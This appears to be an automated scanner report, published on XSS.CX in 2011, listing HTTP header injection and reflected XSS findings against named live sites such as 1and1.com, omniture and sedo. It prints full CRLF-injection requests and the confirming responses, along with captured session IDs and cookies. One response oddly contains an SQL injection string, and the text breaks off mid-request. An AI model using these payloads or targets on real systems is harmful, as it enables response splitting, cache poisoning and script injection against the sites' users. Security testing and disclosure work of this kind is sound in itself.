XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10162011-01

Report generated by XSS.CX at Sun Oct 16 06:44:45 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. HTTP header injection

1.1. http://admin.1and1.com/xml/config/Login [REST URL parameter 3]

1.2. https://admin.1and1.com/xml/config/Login [REST URL parameter 3]

1.3. https://admin.1and1.com/xml/config/TaOverview [REST URL parameter 3]

1.4. https://admin.1and1.com/xml/sendpass/passClientNumber [REST URL parameter 3]

1.5. http://mywebsite.1and1.com/Jumpto [jsessionid parameter]

1.6. http://mywebsite.1and1.com/Jumpto [name of an arbitrarily supplied request parameter]

1.7. http://mywebsite.1and1.com/Jumpto [origin.page parameter]

1.8. http://mywebsite.1and1.com/Jumpto [site parameter]

1.9. http://mywebsite.1and1.com/Jumpto [startClub parameter]

1.10. http://mywebsite.1and1.com/build-website [jsessionid parameter]

1.11. http://mywebsitepersonal.1and1.com/create-personal-website [__lf parameter]

1.12. http://order.1and1.com/Jumpto [jsessionid parameter]

1.13. http://order.1and1.com/Jumpto [name of an arbitrarily supplied request parameter]

1.14. http://order.1and1.com/Jumpto [origin.page parameter]

1.15. http://order.1and1.com/Jumpto [page parameter]

1.16. http://order.1and1.com/Jumpto [site parameter]

1.17. https://webmailcluster.perfora.net/xml/webmail/Login [REST URL parameter 3]

2. Cross-site scripting (reflected)

2.1. http://adsfac.eu/ag.asp [cc parameter]

2.2. http://adsfac.eu/ag.asp [clk parameter]

2.3. http://adsfac.eu/ag.asp [clk parameter]

2.4. https://mailxchange.1and1.com/ajax/login [REST URL parameter 2]

2.5. https://mailxchange.1and1.com/ajax/login [action parameter]

2.6. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]

2.7. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]

2.8. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]

2.9. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mbox parameter]

2.10. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mboxFactoryId parameter]

2.11. http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss [REST URL parameter 2]

2.12. http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f [REST URL parameter 2]

2.13. http://www.sedo.com/rss/rss_list.php [country parameter]

2.14. http://www.sedo.com/rss/rss_list.php [partnerid parameter]

2.15. http://www.sedo.com/search/service/common.php [f parameter]

2.16. http://www.sedo.com/search/service/common.php [m parameter]

2.17. http://www.sedo.com/search/service/common.php [o parameter]

2.18. http://www.sedo.com/service/common.php [f parameter]

2.19. http://www.sedo.com/service/common.php [m parameter]

2.20. http://www.sedo.com/service/common.php [o parameter]



1. HTTP header injection  next
There are 17 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://admin.1and1.com/xml/config/Login [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.1and1.com
Path:   /xml/config/Login

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 2ddde%0d%0a15f27619d53 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /xml/config/2ddde%0d%0a15f27619d53?__lf=guided&__rd=ac170c5655Oz7UTnmWntXabz1kqt7mbi&origin[site]=PU.NGC.US&origin[page]=create-personal-website&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a HTTP/1.1
Host: admin.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsitepersonal.1and1.com/;jsessionid=F1E6BADB229760CEAA9FD35CE214E72F.TCpfix223b?linkOrigin=select&linkId=ct.tabs.create-personal-website
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:5:AAABMwoTpgtpXkfrtbMykwlfOvf7KDvW:1318724019723; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:16:29 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=421b6d4c664c7000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://admin.1and1.com/xml/config/2ddde
15f27619d53
;jsessionid=4058E76914354CC5C215FFD2723B786B.TC66b?__lf=guided&__rd=ac170c5655Oz7UTnmWntXabz1kqt7mbi&origin[site]=PU.NGC.US&origin[page]=create-personal-website&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a
Content-Length: 0
Vary: User-Agent
Content-Type: text/plain; charset=ISO-8859-1


1.2. https://admin.1and1.com/xml/config/Login [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://admin.1and1.com
Path:   /xml/config/Login

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3c70c%0d%0ac7d3ec588de was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /xml/config/3c70c%0d%0ac7d3ec588de;jsessionid=1BF142CE6043B546CFF49CF9D1F286C6.TC62b?__lf=guided&__rd=ac170c5655Oz7UTnmWntXabz1kqt7mbi&origin[site]=PU.NGC.US&origin[page]=create-personal-website&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a HTTP/1.1
Host: admin.1and1.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsitepersonal.1and1.com/;jsessionid=F1E6BADB229760CEAA9FD35CE214E72F.TCpfix223b?linkOrigin=select&linkId=ct.tabs.create-personal-website
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:7:AAABMwoUNhqkcODo58*XDNYl8svD*ZJD:1318724056602; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; __PFIX_SEC_fcaeb61968b8f98ffad8a14a1f406eb4=1318724043745:2aaf9d930737a800; __PFIX_TST_=3339023792e16c00

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:18:29 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://admin.1and1.com/xml/config/3c70c
c7d3ec588de
?__lf=guided&__rd=ac170c5655Oz7UTnmWntXabz1kqt7mbi&origin[site]=PU.NGC.US&origin[page]=create-personal-website&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a
Content-Length: 0
Vary: User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1


1.3. https://admin.1and1.com/xml/config/TaOverview [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://admin.1and1.com
Path:   /xml/config/TaOverview

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload f6651%0d%0a1f3ed0baf2c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /xml/config/f6651%0d%0a1f3ed0baf2c;jsessionid=7F020952C2848CABB9C6B9DF89D4631C.TC65b HTTP/1.1
Host: admin.1and1.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://admin.1and1.com/xml/config/Login;jsessionid=1BF142CE6043B546CFF49CF9D1F286C6.TC62b?__lf=guided&__rd=ac170c5655Oz7UTnmWntXabz1kqt7mbi&origin[site]=PU.NGC.US&origin[page]=create-personal-website&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1u1UALog=1; __PFIX_SEC_fcaeb61968b8f98ffad8a14a1f406eb4=1318724049724:2aaf9d930737a800; emos_jcsid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1:ChRyAQAAATPAZNJWicW3yHp0a2B*jGnX:1318724071937; emos_jcvid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1:ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1318724071937:0:false:15; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:8:AAABMwoWMY2wZSfpx1gQT8DuGwTPeYom:1318724186509; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; __PFIX_TST_=12afd7efe324a400

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:19:57 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://admin.1and1.com/xml/config/f6651
1f3ed0baf2c

Content-Length: 0
Vary: User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1


1.4. https://admin.1and1.com/xml/sendpass/passClientNumber [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://admin.1and1.com
Path:   /xml/sendpass/passClientNumber

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload f81df%0d%0a8ac77d3226 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /xml/sendpass/f81df%0d%0a8ac77d3226;jsessionid=8B707E1A341B7FD3A2E520153718BB81.TC65b?__frame=_top&__lf=HomeFlow HTTP/1.1
Host: admin.1and1.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://admin.1and1.com/xml/config/Login;jsessionid=8B707E1A341B7FD3A2E520153718BB81.TC65b?__reuse=1318724183168
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_SEC_fcaeb61968b8f98ffad8a14a1f406eb4=1318724049724:2aaf9d930737a800; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:8:AAABMwoWMY2wZSfpx1gQT8DuGwTPeYom:1318724186509; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; __PFIX_TST_=12afd7efe324a400; __PFIX_SEC_ad83b72bc54df9d057d189ff55c8ec6a=1318724188818:62b090d584921400; emos_jcsid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:2:ChaNUgAAATMS4djTtkUQk76XLmYYljlk:1318724210002; emos_jcvid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1:ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1318724071937:0:false:15

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:19:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://admin.1and1.com/xml/sendpass/f81df
8ac77d3226
?__frame=_top&__lf=HomeFlow
Content-Length: 0
Vary: User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1


1.5. http://mywebsite.1and1.com/Jumpto [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsite.1and1.com
Path:   /Jumpto

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload cf19b%0d%0abd512bc408d was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__lf=guidedcf19b%0d%0abd512bc408d&origin.page=build-website&linkOrigin=build-website&linkId=weiter&startClub=false&site=PU.NGC.US HTTP/1.1
Host: mywebsite.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsite.1and1.com/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723908161&__lf=Static
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: variant.configname=2010-11-12; variant="bGVhZDpkZWZhdWx0""; _ut=aZVoqWFBLZDliYmJcb2VsMmpkMSMtZllTK0I1LxcyLy8uLSsrLygpJyYoKR8hIB8cQS9bUGl3MC8tXTVfbjQnKCUrKSMjKB4lHSAjO3N0Oi02Zm81KCkmLCokJCkfJh4hJA==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:2:AAABMwoSV1xjeIGFZAlpKqGNb2QXMatX:1318723934044; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:12:56 GMT
Server: Apache
Location: http://redirect.1and1.com/ac170c55P5SqPtlGgDqAkvhpyGHa9HP2/?origin.site=PU.NGH.US&origin.sid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b&origin.page=build-website&target.site=PU.NGC.US&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&startClub=false&__lf=guidedcf19b
bd512bc408d

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=fYGw8amJdXzRdXV1XamBnLWVfLB4oYVROPVRHQSktKiopKCYmKiMkIiEjJBocGxouU0FtYmRyKyooWDBaaS8iIyAmJB4eIzA3LzI1Nm5vNSgxYWowIyQhJyUfHyQaODAzNg==; Expires=Fri, 03-Nov-2079 03:27:03 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.6. http://mywebsite.1and1.com/Jumpto [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsite.1and1.com
Path:   /Jumpto

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload bf42f%0d%0a0a2e5487a6a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__lf=guided&origin.page=build-website&linkOrigin=build-website&linkId=weiter&startClub=false&site=PU.NGC.US&bf42f%0d%0a0a2e5487a6a=1 HTTP/1.1
Host: mywebsite.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsite.1and1.com/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723908161&__lf=Static
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: variant.configname=2010-11-12; variant="bGVhZDpkZWZhdWx0""; _ut=aZVoqWFBLZDliYmJcb2VsMmpkMSMtZllTK0I1LxcyLy8uLSsrLygpJyYoKR8hIB8cQS9bUGl3MC8tXTVfbjQnKCUrKSMjKB4lHSAjO3N0Oi02Zm81KCkmLCokJCkfJh4hJA==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:2:AAABMwoSV1xjeIGFZAlpKqGNb2QXMatX:1318723934044; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:15:00 GMT
Server: Apache
Location: http://redirect.1and1.com/ac170c55P5SqPtlGgDqAkvhpyGHa9HP2/?origin.site=PU.NGH.US&origin.sid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b&origin.page=build-website&target.site=PU.NGC.US&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&startClub=false&bf42f
0a2e5487a6a
=1&__lf=guided
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=aZVoqWFBLZDliYmJcb2VsMmpkMSMtZllTK0I1LxcyLy8uLSsrLygpJyYoKR8hIB8cQS9bUGl3MC8tXTVfbjQnKCUrKSMjKB4lHSAjO3N0Oi02Zm81KCkmLCokJCkfJh4hJA==; Expires=Fri, 03-Nov-2079 03:29:07 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.7. http://mywebsite.1and1.com/Jumpto [origin.page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsite.1and1.com
Path:   /Jumpto

Issue detail

The value of the origin.page request parameter is copied into the Location response header. The payload 11d40%0d%0aec5e36e0f3b was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__lf=guided&origin.page=11d40%0d%0aec5e36e0f3b&linkOrigin=build-website&linkId=weiter&startClub=false&site=PU.NGC.US HTTP/1.1
Host: mywebsite.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsite.1and1.com/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723908161&__lf=Static
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: variant.configname=2010-11-12; variant="bGVhZDpkZWZhdWx0""; _ut=aZVoqWFBLZDliYmJcb2VsMmpkMSMtZllTK0I1LxcyLy8uLSsrLygpJyYoKR8hIB8cQS9bUGl3MC8tXTVfbjQnKCUrKSMjKB4lHSAjO3N0Oi02Zm81KCkmLCokJCkfJh4hJA==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:2:AAABMwoSV1xjeIGFZAlpKqGNb2QXMatX:1318723934044; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:13:13 GMT
Server: Apache
Location: http://redirect.1and1.com/ac170c55P5SqPtlGgDqAkvhpyGHa9HP253614101' or 1=1-- /?origin.site=PU.NGH.US&origin.sid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b&origin.page=11d40
ec5e36e0f3b
&target.site=PU.NGC.US&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&startClub=false&__lf=guided
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=CY1goVmVgYjdgYGBabWNqMGhiLyErZFdRKUAzRCwwLS0sKykpLSYnJSQmJx0fHh0aPy1wZWd1Li0rWzNdbDIlJiMpJyEhJhwjGzU4OXFyOCs0ZG0zJickKigiIicdJBwfOQ==; Expires=Fri, 03-Nov-2079 03:27:20 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.8. http://mywebsite.1and1.com/Jumpto [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsite.1and1.com
Path:   /Jumpto

Issue detail

The value of the site request parameter is copied into the Location response header. The payload bef90%0d%0a11c14971bbd was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__lf=guided&origin.page=build-website&linkOrigin=build-website&linkId=weiter&startClub=false&site=bef90%0d%0a11c14971bbd HTTP/1.1
Host: mywebsite.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsite.1and1.com/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723908161&__lf=Static
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: variant.configname=2010-11-12; variant="bGVhZDpkZWZhdWx0""; _ut=aZVoqWFBLZDliYmJcb2VsMmpkMSMtZllTK0I1LxcyLy8uLSsrLygpJyYoKR8hIB8cQS9bUGl3MC8tXTVfbjQnKCUrKSMjKB4lHSAjO3N0Oi02Zm81KCkmLCokJCkfJh4hJA==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:2:AAABMwoSV1xjeIGFZAlpKqGNb2QXMatX:1318723934044; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:14:09 GMT
Server: Apache
Location: http://redirect.1and1.com/ac170c55P5SqPtlGgDqAkvhpyGHa9HP2/?origin.site=PU.NGH.US&origin.sid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b&origin.page=build-website&target.site=bef90
11c14971bbd
&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&startClub=false&__lf=guided
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=TaV4uXFRPUSZPT2Zgc2lwNm5oNScxal1XL0Y5MxsfHBwbMS8vMywtKyosLSMlJCMgRTNfVFZkHRwxYTljcjgrLCkvLScnLCIpISQnKGBhJzE6anM5LC0qMC4oKC0jKiIlKA==; Expires=Fri, 03-Nov-2079 03:28:16 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.9. http://mywebsite.1and1.com/Jumpto [startClub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsite.1and1.com
Path:   /Jumpto

Issue detail

The value of the startClub request parameter is copied into the Location response header. The payload e979c%0d%0a3195436f668 was submitted in the startClub parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__lf=guided&origin.page=build-website&linkOrigin=build-website&linkId=weiter&startClub=e979c%0d%0a3195436f668&site=PU.NGC.US HTTP/1.1
Host: mywebsite.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsite.1and1.com/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723908161&__lf=Static
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: variant.configname=2010-11-12; variant="bGVhZDpkZWZhdWx0""; _ut=aZVoqWFBLZDliYmJcb2VsMmpkMSMtZllTK0I1LxcyLy8uLSsrLygpJyYoKR8hIB8cQS9bUGl3MC8tXTVfbjQnKCUrKSMjKB4lHSAjO3N0Oi02Zm81KCkmLCokJCkfJh4hJA==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:2:AAABMwoSV1xjeIGFZAlpKqGNb2QXMatX:1318723934044; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:13:53 GMT
Server: Apache
Location: http://redirect.1and1.com/ac170c55P5SqPtlGgDqAkvhpyGHa9HP2/?origin.site=PU.NGH.US&origin.sid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b&origin.page=build-website&target.site=PU.NGC.US&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&startClub=e979c
3195436f668
&__lf=guided
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=wZlsrWVFMTjpjY2NdcGZtM2tlMiQuZ1pULEM2MBgcMDAvLiwsMCkqKCcpKiAiISAdQjBcUVN4MTAuXjZgbzUoKSYsKiQkKR8mHiEkJXR1Oy43Z3A2KSonLSslJSogJx8iJQ==; Expires=Fri, 03-Nov-2079 03:28:00 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.10. http://mywebsite.1and1.com/build-website [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsite.1and1.com
Path:   /build-website

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload 1d2d8%0d%0a4b0a099611f was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

GET /build-website;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__lf=Static1d2d8%0d%0a4b0a099611f&__rd=ac170c55P5SqPtlGgDqAkvhpyGHa9HP2&origin[site]=PU.WH.US&origin[page]=Home&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a HTTP/1.1
Host: mywebsite.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://order.1and1.com/;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
